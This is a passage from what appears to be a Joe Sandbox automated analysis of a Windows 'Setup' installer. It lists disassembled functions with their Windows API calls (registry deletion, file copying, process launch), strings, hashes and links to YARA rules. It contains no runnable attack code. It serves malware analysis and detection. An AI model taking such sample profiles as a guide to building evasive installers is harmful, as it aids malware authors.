                                                                  • Associated: 00000000.00000002.2082782926.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2083121101.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID: ItemTextlstrlenwsprintf
                                                                  • String ID: %u.%u%s%s
                                                                  • API String ID: 3540041739-3551169577
                                                                  • Opcode ID: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                                                  • Instruction ID: 019992b557dc20c415266b5889428492ee6a52d86c3b4952972254649920ef77
                                                                  • Opcode Fuzzy Hash: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                                                  • Instruction Fuzzy Hash: DC11527270021477CF10AA699D45F9E765EEBC5334F10423BF519F31E1D6388A158259
                                                                  Function 004027E3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                  • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                    • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                    • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                  Strings
                                                                  • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                  • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2082726570.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082766792.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2083121101.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                  • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                  • API String ID: 1697273262-1764544995
                                                                  • Opcode ID: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                  • Instruction ID: 70287f52249eeba914cab3bee2f8f529b2cd5257afac1a85b0186071c419a2a5
                                                                  • Opcode Fuzzy Hash: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                  • Instruction Fuzzy Hash: 2511E732E00200ABDB10FFA5DD4AABE3A64EF40354F10403FF50AB61D2D6798E50C6AD
                                                                  Function 00402665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                    • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                    • Part of subcall function 00406301: FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                    • Part of subcall function 00406301: FindClose.KERNEL32(00000000), ref: 00406318
                                                                  • lstrlenW.KERNEL32 ref: 004026B4
                                                                  • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                  • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2082726570.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082766792.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2083121101.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                  • String ID: CopyFiles "%s"->"%s"
                                                                  • API String ID: 2577523808-3778932970
                                                                  • Opcode ID: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                                  • Instruction ID: 7c1d43f40acf3f33c375e3424532232737b5c7d4dc38a4161669d523a66d0fcf
                                                                  • Opcode Fuzzy Hash: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                                  • Instruction Fuzzy Hash: 8A114F71D00214AADB10FFF6984699FBBBCAF44354B10843BA502F72D2E67989418759
                                                                  Function 00406250 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2082726570.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082766792.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2083121101.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID: lstrcatwsprintf
                                                                  • String ID: %02x%c$...
                                                                  • API String ID: 3065427908-1057055748
                                                                  • Opcode ID: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                  • Instruction ID: 9bf571533c0fd83e5fe1ff618cfd19ea7d9613251e6e948213dceada22d50e27
                                                                  • Opcode Fuzzy Hash: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                  • Instruction Fuzzy Hash: E201D272510219BFCB01DF98CC44A9EBBB9EF84714F20817AF806F3280D2799EA48794
                                                                  Function 00405073 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41comCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • OleInitialize.OLE32(00000000), ref: 00405083
                                                                    • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                  • OleUninitialize.OLE32(00000404,00000000), ref: 004050D1
                                                                    • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                    • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2082726570.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082766792.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2083121101.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                  • String ID: Section: "%s"$Skipping section: "%s"
                                                                  • API String ID: 2266616436-4211696005
                                                                  • Opcode ID: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                  • Instruction ID: 3a4ae3dd184d198318ece42e1af7a5bc75ccdc2bd7a030bb5b2a43e0dda7b67b
                                                                  • Opcode Fuzzy Hash: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                  • Instruction Fuzzy Hash: 0EF0F433504300ABE7106766AC02B1A7BA0EF84724F25017FFA09721E2DB7928418EAD
                                                                  Function 004020F9 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetDC.USER32(?), ref: 00402100
                                                                  • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                  • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                    • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00424179,759223A0,00000000), ref: 00406902
                                                                  • CreateFontIndirectW.GDI32(00420110), ref: 0040216A
                                                                    • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2082726570.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082766792.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2083121101.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                  • String ID:
                                                                  • API String ID: 1599320355-0
                                                                  • Opcode ID: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                                                  • Instruction ID: 0ba792ce9c48b24537a9dfec97a4105c0a721b5be590283e64661935fd66df2d
                                                                  • Opcode Fuzzy Hash: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                                                  • Instruction Fuzzy Hash: B6018872B042509FF7119BB4BC4ABAA7BE4A715315F504436F141F61E3CA7D4411C72D
                                                                  Function 00407224 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00406EFE: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                  • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407265
                                                                  • lstrcmpW.KERNEL32(?,Version ), ref: 00407276
                                                                  • lstrcpynW.KERNEL32(?,?,?), ref: 0040728D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2082726570.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082766792.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2083121101.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID: lstrcpyn$CreateFilelstrcmp
                                                                  • String ID: Version
                                                                  • API String ID: 512980652-315105994
                                                                  • Opcode ID: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                  • Instruction ID: f6016284c167eb8c93e4c4d2cd91337f160ffdcdaea293fd9af5b6974d265005
                                                                  • Opcode Fuzzy Hash: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                  • Instruction Fuzzy Hash: 74F08172A0021CBBDF109BA5DD45EEA777CAB44700F000076F600F6191E2B5AE148BA1
                                                                  Function 004032D2 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • DestroyWindow.USER32(00000000,00000000,0040372F,00000001,?,?,?,00000000,00403A73,?), ref: 004032E5
                                                                  • GetTickCount.KERNEL32 ref: 00403303
                                                                  • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                                  • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A73,?), ref: 0040332E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2082726570.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082766792.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2083121101.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                  • String ID:
                                                                  • API String ID: 2102729457-0
                                                                  • Opcode ID: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                  • Instruction ID: 7080548a0c715e844c944b711630a30770084a0de0adb1936a850f0acfbe0ad2
                                                                  • Opcode Fuzzy Hash: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                  • Instruction Fuzzy Hash: 76F05E30541220BBC620AF24FD89AAF7F68B705B1274008BAF405B11A6C7384D92CFDC
                                                                  Function 00406391 Relevance: 6.0, APIs: 4, Instructions: 31memorylibraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
                                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
                                                                  • GlobalFree.KERNEL32(00000000), ref: 004063CA
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2082726570.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082766792.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2083121101.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                  • String ID:
                                                                  • API String ID: 2883127279-0
                                                                  • Opcode ID: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                  • Instruction ID: 23858f5f5f858bd20c6f81bae205610dc5c3869b82bfcacec746ad73dc06cfd6
                                                                  • Opcode Fuzzy Hash: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                  • Instruction Fuzzy Hash: 82E092313001117BF2101B269D8CD677EACDBCA7B2B05013AF645E11E1C6308C10C674
                                                                  Function 004048F8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • IsWindowVisible.USER32(?), ref: 0040492E
                                                                  • CallWindowProcW.USER32(?,00000200,?,?), ref: 0040499C
                                                                    • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2082726570.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082766792.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2083121101.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID: Window$CallMessageProcSendVisible
                                                                  • String ID:
                                                                  • API String ID: 3748168415-3916222277
                                                                  • Opcode ID: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                  • Instruction ID: 3c1fd1ddb59456d7d2ea24cd553691e7f5dd8d926ac1a383129e0726a186868e
                                                                  • Opcode Fuzzy Hash: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                  • Instruction Fuzzy Hash: CE118FF1500209ABDF115F65DC44EAB776CAF84365F00803BFA04761A2C37D8D919FA9
                                                                  Function 00402797 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                                  • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2082726570.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082766792.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2083121101.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID: PrivateProfileStringlstrcmp
                                                                  • String ID: !N~
                                                                  • API String ID: 623250636-529124213
                                                                  • Opcode ID: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                  • Instruction ID: 1025b72e91f13a3121db677028adcce723ab2f3f19a12cbdb86f5280e69f3e4e
                                                                  • Opcode Fuzzy Hash: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                  • Instruction Fuzzy Hash: 14E0C0716002086AEB01ABA1DD89DAE7BACAB45304F144426F601F71E3E6745D028714
                                                                  Function 00405C6B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                  • CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                  Strings
                                                                  • Error launching installer, xrefs: 00405C74
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2082726570.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082766792.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2083121101.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID: CloseCreateHandleProcess
                                                                  • String ID: Error launching installer
                                                                  • API String ID: 3712363035-66219284
                                                                  • Opcode ID: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                  • Instruction ID: 058e85fc593d498414a6a643ff83d14e048665682532f700ab3f6144ed6d8858
                                                                  • Opcode Fuzzy Hash: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                  • Instruction Fuzzy Hash: A4E0ECB0900209AFEB009F65DD09E7B7BBCEB00384F084426AD10E2161E778D8148B69
                                                                  Function 004062CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                  • wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                    • Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2082726570.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082766792.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2083121101.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID: CloseHandlelstrlenwvsprintf
                                                                  • String ID: RMDir: RemoveDirectory invalid input("")
                                                                  • API String ID: 3509786178-2769509956
                                                                  • Opcode ID: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                  • Instruction ID: 2c5812d3804eb93f93713fa8b891b4ce654538dc852139f9e16b4ff69120e8c2
                                                                  • Opcode Fuzzy Hash: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                  • Instruction Fuzzy Hash: 93D05E34A50206BADA009FE1FE29E597764AB84304F400869F005890B1EA74C4108B0E
                                                                  Function 00405DE2 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
